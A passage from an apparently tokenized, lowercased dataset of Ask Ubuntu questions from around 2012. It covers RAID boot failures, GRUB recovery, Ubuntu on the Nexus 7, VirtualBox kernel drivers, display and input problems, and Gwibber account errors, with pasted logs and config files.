- open ( ) database : path=none use_axi=true use_agent=true traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 243 , in open self._cache = apt.cache ( gtkmainiterationprogress ( ) ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 102 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 149 , in open self._list.read_main_list ( ) systemerror : e : type âebâ is not known on line 58 in source list /etc/apt/sources.list 2012-11-16 20:18:28,218 - softwarecenter.db.enquire - error - _get_estimate_nr_apps_and_nr_pkgs failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 115 , in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset ( 0 , len ( self.db ) , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 176 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1422 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1352 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 154 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 171 , in init_view self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 238 , in __init__ self.build ( desktopdir ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 511 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 271 , in _build_homepage_view self._append_whats_new ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 450 , in _append_whats_new whats_new_cat = self._update_whats_new_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 439 , in _update_whats_new_content docs = whats_new_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 124 , in get_documents nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 317 , in set_query self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 212 , in _blocking_perform_search matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__'
218215	clarification : ssd cache hard drive w/ intel raid	i am considering the lenovo u410 . from everything i have read [ 1 , 2 , 3 , 4 , 5 ] , it seems that ubuntu can be best installed by turning off the raid0 configuration and doing a wipe . i have no interest in keeping windows , but i want to confirm something that remains unclear to me . once i have disabled raid , will i be able to access the ss cache and the hdd individually as one would expect ? my ideal configuration would be to have root ( / ) mounted on the ssd , and /home mounted to the hdd . is that straightforward once raid is disabled ? would i get the performance boost i expect from a ssd ? finally , are there any other factors to consider relating to compatibility ? thank you in advance .
218217	how do you remove empty box on kde desktop ?	i 'm not exactly sure what this empty box on my desktop is however it 's been there pretty much from the beginning . i 'm running kubuntu 12.04 . the empty box was n't an issue until i put a new wallpaper on my desktop ( with the scaled & cropped setting ) , and it 's being pushed to the right . not that it should matter , but the box and wallpaper are on my 2nd monitor . i thought it was a widget , although i 'm not sure now . i unlocked widgets , then right-clicked on it . it always displays the same menu as right-clicking on the desktop anywhere . my understanding is that widgets will display a different menu . i have also looked at desktop effects and they are n't on , so that 's probably not it . desktop effects are not available on this system due to the following technical issues : required x extensions ( xcomposite and xdamage ) are not available . any idea what this may be and how i can remove it ? thank you !
218219	errno 5 install	i am trying to install ubuntu on my desktop . i used a usb that i had used successfully to my laptop , but it does n't work for desktop . ( 12.04 32bit ) when i am trying to boot from usb it says that no os detected in usb and only choice is to restart . i have also burned a dvd with ubuntu 12.10 64bit but when i try to install i get an error : [ errno 5 ] input/output error however , i can use the dvd to `` try '' ( and not install ) ubuntu . no i do n't have any os in hdd . before it was dual boot windows 7 and windows 8 . i do n't know what to do ! please help !
218224	how to get this java -program cplex working in ubuntu 11 ?	i am trying to istall the ibm cplex here and here requiring some java thing but getting err : /tmp/install.dir.7091/linux/resource/jre/bin/java : 1 : syntax error : unterminated quoted string i tested it also as sudo and got the same error . how can i solve this problem ?
218225	path details different in different terminal windows	i have added a particular path to path and i am able to see that it has been added when i echo it , but when i echo $ path in another window i can not see that path i recently added . i am not sure why i am not able to see it there ?
218227	what is battery performance like on the nexus 7 when running ubuntu ?	while running android , advertising claims the nexus 7 has a 8 - 11 hours of battery time , many users claim to get around 6 - 9 hours depending on what type of activity they are doing . have there been any benchmarks done on the tablet while running ubuntu ? is it better or worse ?
218229	can we change the ui on ubuntu on nexus 7 to make it more touch friendly ?	the ui is not exactly touch friendly in ubuntu running on the nexus 7 . the buttons are small , there are only a few multi-touch gestures , etc .
218231	can i right click in ubuntu on nexus 7 ?	how can we right click with the touchscreen ? is this possible ?
218233	how can i prevent my cursor from moving when i am clicking the trackpad ?	i just installed ubuntu 12.10 on my macbook pro . when i click the trackpad , it is always registered as a small mouse movement as well as a click , so it drags whatever i click on . has anybody else encountered this ? is there any synaptics setting that can help ? for the moment , i 've enabled tap to click because normal clicking is so tough . i did n't have this issue when running ubuntu in a vm , but i guess that has another abstraction layer that prevents synaptics from being the one interpreting direct touchpad input . thanks !
218234	can the screen be rotated on the nexus 7 ?	i 've noticed that physically turning the screen does not rotate the image on the nexus 7 . is there any way to rotate the screen ?
218237	were there any modifications to udev in order to allow ubuntu to run on the nexus 7 ?	i 'm curious if there was any extreme modifications or patches to udev in order to get ubuntu running on the nexus 7 ?
218239	ubuntu 12.04 , wireless is disabled	installed ubuntu 12.04 , updated , installed drivers and have been trying to enable the wireless from terminal but no luck . i am using a lenovo b570 laptop with a broadcom bcm 4343 802.11b/g/n wireless lan controller . again wireless networking is disabled and refuses to re-enable even tho i never had
218240	how can i participate on the nexus 7 project as a community member ?	what can i do to help this project ?
218244	where i can post my request to no removal qt3 libraries from next ubuntu releases ?	i know that ubuntu takes 'debian sid ' packages to bake next ubuntu and i know that debian developers currently obsoletes qt3-libraries . unfortunately i 'm still need it because in my company we still use qt3 libraries for our project .
218249	what `` gotchas '' should i watch out for when installing ubuntu on the nexus 7 ?	how long does it take to install ubuntu on the nexus 7 ? is it normal for the screen to be black during power on ? i do n't see an ubuntu logo . is that expected ?
218251	disks not ready in array causes mdadm to force initramfs shell	okay , this is starting to get pretty frustrating . i 've read most of the other answers on this site that have anything to do with this issue but i 'm still not getting anywhere . i have a raid 6 array with 10 devices and 1 spare . the os is on a completely separate device . at boot only three of the 10 devices in the raid are available , the others become available later in the boot process . currently , unless i go through initramfs i ca n't get the system to boot - it just hangs with a blank screen . when i do boot through recovery ( initramfs ) , i get a message asking if i want to assemble the degraded array . if i say no and then exit initramfs the system boots fine and my array is mounted exactly where i intend it to . here are the pertinent files as near as i can tell . ask me if you want to see anything else . # mdadm.conf # # please refer to mdadm.conf ( 5 ) for information about this file . # # by default ( built-in ) , scan all partitions ( /proc/partitions ) and all # containers for md superblocks . alternatively , specify devices to scan , using # wildcards if desired . # device partitions containers # auto-create devices with debian standard permissions # create owner=root group=disk mode=0660 auto=yes # automatically tag new arrays as belonging to the local system homehost < system > # instruct the monitoring daemon where to send mail alerts mailaddr root # definitions of existing md arrays # this file was auto-generated on tue , 13 nov 2012 13:50:41 -0700 # by mkconf $ id $ array /dev/md0 level=raid6 num-devices=10 metadata=1.2 spares=1 name=craggenmore : data uuid=37eea980:24df7b7a : f11a1226 : afaf53ae here is fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sdc2 during installation uuid=3fa1e73f-3d83-4afe-9415-6285d432c133 / ext4 errors=remount-ro 0 1 # swap was on /dev/sdc3 during installation uuid=c4988662-67f3-4069-a16e-db740e054727 none swap sw 0 0 # mount large raid device on /data /dev/md0 /data ext4 defaults , nofail , noatime , nobootwait 0 0 output of cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md0 : active raid6 sda [ 0 ] sdd [ 10 ] ( s ) sdl [ 9 ] sdk [ 8 ] sdj [ 7 ] sdi [ 6 ] sdh [ 5 ] sdg [ 4 ] sdf [ 3 ] sde [ 2 ] sdb [ 1 ] 23441080320 blocks super 1.2 level 6 , 512k chunk , algorithm 2 [ 10/10 ] [ uuuuuuuuuu ] unused devices : < none > here is the output of mdadm -- detail -- scan -- verbose array /dev/md0 level=raid6 num-devices=10 metadata=1.2 spares=1 name=craggenmore : data uuid=37eea980:24df7b7a : f11a1226 : afaf53ae devices=/dev/sda , /dev/sdb , /dev/sde , /dev/sdf , /dev/sdg , /dev/sdh , /dev/sdi , /dev/sdj , /dev/sdk , /dev/sdl , /dev/sdd please let me know if there is anything else you think might be useful in troubleshooting this ... i just ca n't seem to figure out how to change the boot process so that mdadm waits until the drives are ready to build the array . everything works just fine if the drives are given enough time to come online . edit : changed title to properly reflect situation
218254	ubuntu 12.04 does not boot after installation	i installed ubuntu 12.04 by replacing my windows installation . everything worked perfectly . then it asked me to restart . i did , but it does not go into a selection menu or start up menu . the screen is black and shows a blinking white stripe in the left top corner . even after waiting 1 hour it did not start anything . what am i doing wrong ?
218255	lubuntu 12.04 ppc slow startup and shutdown	i 've installed lubuntu 12.04 on a powerbook g4 ( powerpc 1ghz , 1gb ram , geforce mx 440 ) . everything works perfectly except the startup and shutdown . to startup my system i have to wait about 3 minutes ( and similar time to shutdown ) giving a look at /var/log/dmesg i noticed the following [ drm ] nouveau 0000:00:10.0 : detected an nv10 generation card ( 0x017900a5 ) checking generic ( b8004000 151800 ) vs hw ( b8000000 80000000 ) fb : conflicting fb hw usage nouveaufb vs 0ffb nvda , displ - removing generic driver the only issue concerns nouveau : my /var/log/kern.log says bug : soft lockup - cpu # 0 stuck for 22s ! i 've booted passing the nouveau.modeset=0 parameter and the system boot in 15 seconds but with 4 bit graphics -- any idea how to fix ?
218257	okular not showing pstricks	i 'm on ubuntu 12.04 and using okular 0.14.3 , which i have as my dvi viewer for texmaker and texlive . works fine , but does not render pstricks . okular help says you may need to install libspectre , which i have . but still no result . any help ? thanks gianluca
218259	how to change the email interval for apticron ?	i have a vps running ubuntu 12.04 server . apticron sends out daily emails when there are updates available . i want to change this to weekly . i looked at the configuration options in /etc/apticron/apticron.conf , but that does not list an option to set a different interval for sending the reminder emails . i also ca n't see a relevant cronjob to modify . can i change the apticron email interval ?
218260	bug : unable to handle kernel null pointer dereference at	i have recently installed new system on my disc , ubuntu 12.04 . installation proceeded without problems , i started installing additional software and put data from other discs . i had already two times bug report , it was quite long , and i have no idea how to acces to log file ( which probably is somewhere saved ) and since i had to switch off the computer using the button , anything else was possible , here is just a small part of it ( what i 've noted on paper ) could not write bytes : broken pipe speach dicpatcher disabled : edit etc/default/speach-dispatcher saned disabled : edit ... . and than : bug : unable to handle kernel null pointer dereference at 0000009c i 've run memory test in grub , everything is fine . first time it occured when i was using rsync , second time when i was trying to install texlive . should i install whole system once again ? or can it be hardware problem ? or something else ? if there is any hardware details which may be relevant , please ask , since i have no idea what is happening , i do n't know what kind of information could be useful . thanks p.s . dmesg output :
218264	photo transfer problems from camera	we have a digital camera ( cannon sx130 is ) which we often connect to the ubuntu 12.10 desktop via usb in order to download the images . in past flavours of linux ( mint 12 was most recent ) it worked fine , however since upgrading to ubuntu 12.10 , the process fails after downloading a small number of the images . i can view the images which will be transferred in the preview window , and i can browse the camera file system to download the images manually , but if i just drag/drop the images over from camera to desktop , it freezes after 5-6 are copied over . i 've been able to get around the problem by only copying 3-4 at a time , but when you have 100+ images to transfer , that gets really frustrating . any advice on where i could start looking for answers , or how i could diagnose the source of the problem further ? we have also had some issues with wireless usb mice though it may not be related . i 'm hoping my usb controller in the computer is n't dying ... it 's not that old . also , it seems to work much better under windows .
218268	ubuntu one - logging problem	i made an ubuntu one account for windows a few years ago . and today , i have to install ubuntu one on a new computer and i can not logging with the email and password i use to login in this website . could you help me ! ! sincerely yours , vincent
218269	mouse does n't work & internet connection not made in ubuntu 12.04 lts	yesterday , nov 15 , 2012 , i booted into my ubuntu 12.04 lts system . it has resided on a crucial 128 gb ssd with about 90 % free space since early summer . i also have windows 7 loaded on another crucial 256 gb ssd . ubuntu has set up a dual boot system for me even though each os has its own ssd . i have been using this setup without problems since summer . yesterday , when the boot process finished , my microsoft comfort mouse 3000 did not work and there was a message that ubuntu was not connected to the internet . so w/o the mouse i was forced to turn the machine off manually . about 4 days ago ubuntu worked fine and booting into win 7 also works fine . i have a backup machine with the same style mouse on it so i swapped the mouse onto this system . same results . but both mice work when booting into win 7 . today i removed both ssds and installed my ubuntu 12.04 hd which has not been used since i moved ubuntu to the ssd from it . same results . between the last time i used ubuntu 12.04 on the ssd and when i tried to use it again i made no changes to my machine , either hardware or software . my machines specs are : amd fx-6100 , msi 990fxa-gd65 am3+ format with latest bios ( ver 19.9 ) , corsair vengeance 1866 mhz memory - 16 gb ( 4gb x 4 sticks ) , msi n580gtx video card ( nvidia 306.97 drivers ) , sony bravia 32 '' hd tv as a monitor , pioneer bluray dvd-rw , dsl connection to internet thru a router ( 10 mps ) , crucial 128 gb ssd ( 90 % free space ) , microsoft comfort mouse 3000 i try to maintain current bios and drivers for all devices . i mostly use my ubuntu system for programming in gcc and opencobol , surfing the internet and e-mailing . no games are installed . i 'm stumped ! if anyone has experienced this same problem i 'd appreciate knowing how you solved it . tia , dave
218271	trying to install ubuntu but getting error input/output error	i was trying to install ubuntu from live-usb and i get error input/output error . i tried boot repair disk for ubuntu . here is the output any help is appreciated . i tried testdisk without any luck . no clue how to get it back .
218272	dual monitor imaging	i 'm having an issue when i set the dual image to span . it seems to be centered with black around the image on both sides . i 'm wondering how to get a full screen span to eliminate the black around the edges . is there a way to do this with a configuration file ? is it possible to set an image to a certain monitor for a full screen span ?
218274	12.10 nautilus on dell xps 12 does not work	i have installed 12.10 on a new dell xps 12 ultrabook . everything seems to work properly right now , including the touch screen , except for nautilus . the left pane works properly , i can select an item on the left and the contents will show up on the right , but when i go to do anything with the contents on the right nothing happens , i ca n't double click to open , i ca n't right click to bring up a menu . i can however hold down the left button and to draw a box to select more than one item , but i ca n't do anything with the selected items . i did not have these problems when i tried 12.04 , but unfortunately the touchscreen does not work out of the box on 12.04 and 12.10 seemed to be the faster way go . any ideas ? how can i log what is happening when i try to do anything in nautilus ?
218276	lubuntu 12.04 on acer laptop boots to blank blue screen	my previous question on this was closed , but i am posting it again as the solution which my son eventually found may assist other users of the forum , or someone may be able to tweak the solution to improve the performance . having installed kubuntu 12.04.01 from a live usb onto my desktop , i wanted to do the same on my laptop , an acer aspire 1362 laptop , which has 256mb ram ( actually 512 `` on the box '' , but a good deal can be borrowed by the graphics ! ) . i found kubuntu would n't run on so little memory but downloaded : lubuntu-12.04-alternate-i386.iso , which i understood was light enough to go . the laptop has one internal 40gb toshiba hard drive divided into 3 partitions : c,19gb with windows xp , windows program files and some data , d , 19gb mostly data , and a small 2gb partition with some acer software , which xp ca n't normally “see” . i transferred most of the contents of d to a memory stick , leaving 16gb free for lubuntu . i did not want to dump xp yet , though it is painfully slow . i installed lubuntu from then usb stick , accepting the default answers to most of the questions . the d : partition was further partitioned into a 500mb boot partition , 10gb for linux , 2gb swap and 6gb for data shareable between linux and windows . i had no error messages during installation , rebooted , was offered the choice of ubuntu or xp , and selected the former . after a few minutes , i get a dark blue screen announcing lubuntu with five dots underneath which lighten in turn . eventually the lights stopped , and whatever i try the screen remains blank apart from “lubuntu” i tried several solutions suggested on the forum for “identical” questions but without success .
218282	gwibber is not able to connect to facebook	i am running gwibber on 12.04 and i am unable to get facebook to connect to gwibber all i get after i login to facebook is success and then nothing i have reported this as a bug i was wondering if there was a way to correct this issue . i have read the other posts on this and none of the answers i seen tried and none of them worked . i was hoping that i might get some fresh answers that might work .
218284	bluetooth crahes on ubuntu 12.10	since installing ubuntu 12.10 my bluetooth is acting up . as soon as i try to pair , the bluetooth applet crashes or the whole system freezes.. under 12.04 and 12.04.1 i had no problems whatsoever . both my htc desire hd and jabra supreme headset would effortlessly pair with my hp probook 4720s . how do i make bluetooth work ? regards , botak
218286	how can i safely remove extra grub installs ?	i am using a macbook pro 6.2 . i installed ubuntu 12.04 and it was working fine . i re-sized my partitions ( to make more space for linux ) and of course messed up grub . this is fine . i corrected the issue , but only after much trial and error . because the mac has efi the installer tried to install grub-efi , which is did fine , but i needed grub-pc ( the mac must boot in bios mode for x to work correctly ) . all tihs trial and error left me with multiple installs of grub on several partitions and the mbr . my current setup is : /dev/sda - grub /dev/sda1 - ( efi partition for os x ) gurb /dev/sda2 - mac os x /dev/sda3 - grub ( also linux partition ) i need to remove grub from /dev/sda , /dev/sda1 , and leave it on /dev/sda3 . i use refit . how can i safely remove the extra installs of grub without harming the install of os x , refit , or grub on /dev/sda3
218290	how do i open a terminal or console window on a new install ?	just installed 12.04 desktop and i was astonished to discover no easy way to open an xterm or gterm or kterm ( a shell prompt ) . writing lengthy shell scripts is a lot easier in a shell . : )
218296	problems running ubuntu 12.10 in vmware player 5	i 'm trying to install ubuntu 12.10 in vmware player 5 . my pc is running windows 7 . the installation seems to go okay , but when i boot up ubuntu , although it starts up and i see the desktop , i ca n't see any task bar or basically anything other than the default wallpaper in the background . when i move my cursor across the screen towards the edges , the desktop flickers and extremely distorted and pixelated objects appear momentarily . i 've tried uninstalling everything , downloading it all again and reinstalling , but i get the exact same problem . does anyone recognise this issue ? is there a more stable pairing than ubuntu 12.10 & wmware player 5.0.1 , perhaps ?
218301	12.04 browser fonts changed unexpectedly	running 12.04 and recently installed font manager and a handful of fonts that i use in gimp . after a recent reboot some fonts in both chromium and firefox are screwy . this is only true on my ubuntu log in ( and it happens in regular ubuntu and ubuntu 2d . ) on my daughter 's profile , all fonts are still normal . fonts on this page are all 100 % ok ( www.askubuntu.com ) but fonts on these pages have changed to one of my newly installed fonts . facebook google yahoo ( some ) gmail i had myunity installed and chose restore all default fonts , but that had no effect . usettings no longer launches for me for some reason . the fonts i installed were all put in to ~/fonts/
218303	the updates manager has stopped working	this message has come up and i do not know what to do to make it better . e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_main_i18n_translation-en , e : the package lists or status file could not be parsed or opened . please give me some assistance as i do not know what to do . many thanks clare
218305	internet connected but not working	i 've been spending the past week setting up ubuntu , and i 've encountered a bit of a roadblock ; for some reason , the past few days my internet 's been connected , but nothing 's loading . when i reboot , it works for a few minutes , then suddenly stops , and ca n't be reset through all my attempts . also , when i boot up , i get a message of 'input not supported ' with the rest of my screen blacked out . i was wondering if there 's any way to fix that ... thanks for taking the time to read through my concerns .
218308	elo touchsystems 2515 not working in 12.10	my touch screen monitor in samsung all in one pc is not working . lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 0a5c:219a broadcom corp . bus 001 device 004 : id 04e7:0124 elo touchsystems bus 002 device 003 : id 15d9:0a4c trust international b.v. usb+ps/2 optical mouse bus 002 device 004 : id 04d9 : a058 holtek semiconductor , inc . bus 002 device 005 : id 2232:1008 xinput ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ elo touchsystems elo touchsystems 2515 itouch plus usb touchmonitor id=9 [ slave pointer ( 2 ) ] ⎜ ↳ elo touchsystems elo touchsystems 2515 itouch plus usb touchmonitor id=10 [ slave pointer ( 2 ) ] ⎜ ↳ usb optical mouse id=11 [ slave pointer ( 2 ) ] ⎜ ↳ usb wireless kbd mouse id=13 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ usb wireless kbd mouse id=12 [ slave keyboard ( 3 ) ] ↳ webcam scb-1100n id=14 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=15 [ slave keyboard ( 3 ) ]
218309	grub rescue help . other answers not working	today i tried to start up my computer , and was welcomed by error : no such partition . grub rescue > it is some kind of command prompt . i had 2 seperate versions of ubuntu , along with windows 7 . i have made several google searches , and used several suggested commands from people having the same issue , and then certain commands would n't be recognized . any help ?
218313	change from transmission to qbittorrent	i 'd like to change the associated magnet link application from transmission to qbittorrent . i 'm running lubuntu 12.10 . i 've tried this so far and its still opening magnet links with transmission . gconftool-2 -t string -s /desktop/gnome/url-handlers/magnet/command `` /usr/bin/qbittorrent '' gconftool-2 -s /desktop/gnome/url-handlers/magnet/needs_terminal false -t bool gconftool-2 -t bool -s /desktop/gnome/url-handlers/magnet/enabled true best regards
218320	virtual box upgrade	i did upgrade virtualbox from 4.1 to 4.2 wheneverver i want to load my win xp vdi , it gives me the following error : '' kernel driver not installed ( rc=-1908 ) the virtualbox linux kernel driver ( vboxdrv ) is either not loaded or there is a permission problem with /dev/vboxdrv . please reinstall the kernel module by executing '/etc/init.d/vboxdrv setup' as root . if it is available in your distribution , you should install the dkms package first . this package keeps track of linux kernel changes and recompiles the vboxdrv kernel module if necessary . '' i ran the suggested step to reinstall the kernel module , and the log file is as follow : makefile:181 : * error : unable to find the sources of your current linux kernel . specify kern_dir= and run make again . stop . makefile:181 : * error : unable to find the sources of your current linux kernel . specify kern_dir= and run make again . stop . makefile:181 : * error : unable to find the sources of your current linux kernel . specify kern_dir= and run make again . stop . i still unable to re-run my win virtual xp vdi file . anyone have a clue ?
218323	does zeitgeist slow performance considerably	this was talked to me today and i actually did not have a proper answer , so i was wondering if zeitgeist had any impact in performance . for example if comparing ubuntu with and without zeitgeist in terms of : memory usage , cpu usage and performance in general . it is my believe that since zeitgeist is mostly en event logger and not a file sysyem indexer , the performance would be so low that it would not registered even on an old pentium 3 when compared , like i said , with an ubuntu that has zeitgeist and one that does n't . am i right or wrong about this assumption ?
218324	problem with the screen resolution on 12.04	i just installed ubuntu on my laptop . the screen resolution is stuck in 1024x768 . the screen is made for 1280x800 . when i run xrandr i get : xrandr : failed to get size of gamma for output default screen 0 : minimum 800 x 600 , current 1024 x 768 , maximum 1024 x 768 default connected 1024x768+0+0 0mm x 0mm 1024x768 61.0* 800x600 61.0 1280x800 is n't offered and i get gamma size error . i was going to look into the xorg.conf file but i could n't locate it . 1280x800 was displayed in windows 7 and i think it is being displayed in grub before ubuntu starts also . here are some details about my computer : cpu : intel atom d2500 1.86ghz chipset : intel 945gse+ich7m lcd : 14 '' tft 16:9 resolution ratio : 1280*800 video card : intel integrated gma950 does anyone know how to fix this ?
218325	usb keyboard works except in terminal window	i just installed 12.10 ( clean install and updates ) . usb keyboard and mouse work fine except the keyboard does not work in a terminal window ( usb mouse is working in terminal ) . keyboard is logitech mk320 and associated mouse . i 'm typing in a mozilla window on the keyboard at this very moment and when i switch to the terminal window , nothing can be typed . any ideas ? i use terminal mode alot .
218326	install ubuntu on fujitsu siemens tx100 s3	i ca n't install ubuntu 12.04 server on server in subject . i 've created raid array from megaraid utility as raid 1 but when i 've tried to install into hard disk ubuntu does n't detect any drive . why ? raid controller is intel corporation 6 series/c200 series chipset family sata raid controller thanks
218328	wii remote set up not working with clementine on ubuntu 12.10	i have tried to follow this link to set up a wiimote to work with clementine and control the music , but i have reached an impasse . when i try to run cmake . -ddistro=ubuntu -dcmake_install_prefix=/usr i come up with the error warning : qt_qmake_executable reported qt_install_libs as /usr/lib/x86_64-linux-gnu warning : but qtcore could n't be found . qt must not be installed correctly , or it was n't found for cross compiling . cmake error at /usr/share/cmake-2.8/modules/findqt4.cmake:594 ( message ) : could not find qtcore . check /home/alex/wiimotedev-project-1.3.0/cmakefiles/cmakeerror.log for more details . call stack ( most recent call first ) : cmakelists.txt:8 ( find_package ) i have qt installed , and i 'm not sure what is going wrong .
218329	what does interrupt in eth0 mean ?	i wonder if `` interrupt '' affects internet connection . eth0 link encap : ethernet hwaddr 60 : eb:69:6c:55:83 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:45 eth1 link encap : ethernet hwaddr 4c:0f:6e:6c : d2:9f inet addr:192.168.11.41 bcast:192.168.11.255 mask:255.255.255.0 inet6 addr : fe80 : :4e0f:6eff : fe6c : d29f/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:159717 errors:0 dropped:0 overruns:0 frame:24945 tx packets:155355 errors:40 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:224953980 ( 224.9 mb ) tx bytes:13688161 ( 13.6 mb ) interrupt:17
218333	upgrading specific pieces of kde 4.x	so this is going to be one of those `` is this even possible ? '' questions . i need to upgrade a piece of my kde from 4.8.5 to 4.9 . specifically , i need to upgrade gwenview from the 2.85 version in kde 4.8.5 to 2.9 version in kde 4.9 . it seems trivial but it 's actually a fairly big deal for me . i recently upgraded my ubuntu to 12.04 , and that upgraded my gwenview to 2.8x . the issue is that the gwenview 2.8 releases accidentally broke a feature that i rely upon very heavily . it 's a known bug that was corrected in 2.9 . unfortunately , the only package available in synaptic is 4.8.5 , which contains gwenview 2.85 . to make matters worse i 'm not sure that i can simply take my whole kde to 4.9 as i am running an older toshiba satellite with the intel 945gma chipset that i was shocked managed to hold up under the weight of 12.04 as it is . well , actually it did n't . i had to install cairo dock as unity 2d was hopeless with this chipset . but anyway , i desperately need to get to gwenview 2.9 without the potential system-wide implosion of upgrading kde to 4.9 . possible ?
218336	cant add facebook and twitter account in gwibber	when trying to add facebook account , im getting an error : an error occured while loading the authentication page but nothing appears on terminal and as same trying to twitter , this occurs on terminal : ( gnome-control-center:14753 ) : account-plugin-warning ** : authsession error : gdbus.error : com.google.code.accountssso.singlesignon.error.ssl : the issuer certificate of a locally looked up certificate could not be found ; the root ca certificate is not trusted for this purpose ; ( gnome-control-center:14753 ) : glib-critical ** : g_variant_new_string : assertion `string ! = null ' failed ( gnome-control-center:14753 ) : glib-critical ** : g_variant_ref_sink : assertion `value ! = null ' failed ( gnome-control-center:14753 ) : glib-critical ** : g_variant_new_variant : assertion `value ! = null ' failed ( gnome-control-center:14753 ) : glib-critical ** : g_variant_get_type : assertion `value ! = null ' failed ( gnome-control-center:14753 ) : glib-critical ** : g_variant_type_is_subtype_of : assertion `g_variant_type_check ( type ) ' failed ( gnome-control-center:14753 ) : glib-critical ** : g_variant_builder_add_value : assertion ` ! gvsb ( builder ) - > expected_type || g_variant_is_of_type ( value , gvsb ( builder ) - > expected_type ) ' failed ( gnome-control-center:14753 ) : glib-critical ** : g_variant_builder_end : assertion `gvsb ( builder ) - > offset > = gvsb ( builder ) - > min_items ' failed ( gnome-control-center:14753 ) : glib-critical ** : g_variant_get_type : assertion `value ! = null ' failed ( gnome-control-center:14753 ) : glib-critical ** : g_variant_type_is_subtype_of : assertion `g_variant_type_check ( type ) ' failed ( gnome-control-center:14753 ) : glib-critical ** : g_variant_builder_add_value : assertion ` ! gvsb ( builder ) - > expected_type || g_variant_is_of_type ( value , gvsb ( builder ) - > expected_type ) ' failed ( gnome-control-center:14753 ) : credentials-cc-panel-critical ** : cc-credentials-authorization-page.vala:196 : error completing auth session process : gdbus.error : com.google.code.accountssso.singlesignon.error.ssl : the issuer certificate of a locally looked up certificate could not be found ; the root ca certificate is not trusted for this purpose ; credentials-cc-panel-message : cc-credentials-accounts-model.vala:344 : failure change reported for non-existent account id : 0 is this a general issue ?
218338	unable to run windows 8 in full screen mode in virtualbox on ubuntu 12.10	not quite sure if this is on topic or not but all of the googling i could find referred to changes to make to get windows 8 to run in full screen mode on windows , however i have n't found any documents or guides on running windows 8 in full screen mode for ubuntu . i am running the 64-bit version of windows 8 on virtualbox 4.2 and i do have the guest additions installed thanks , jonathan
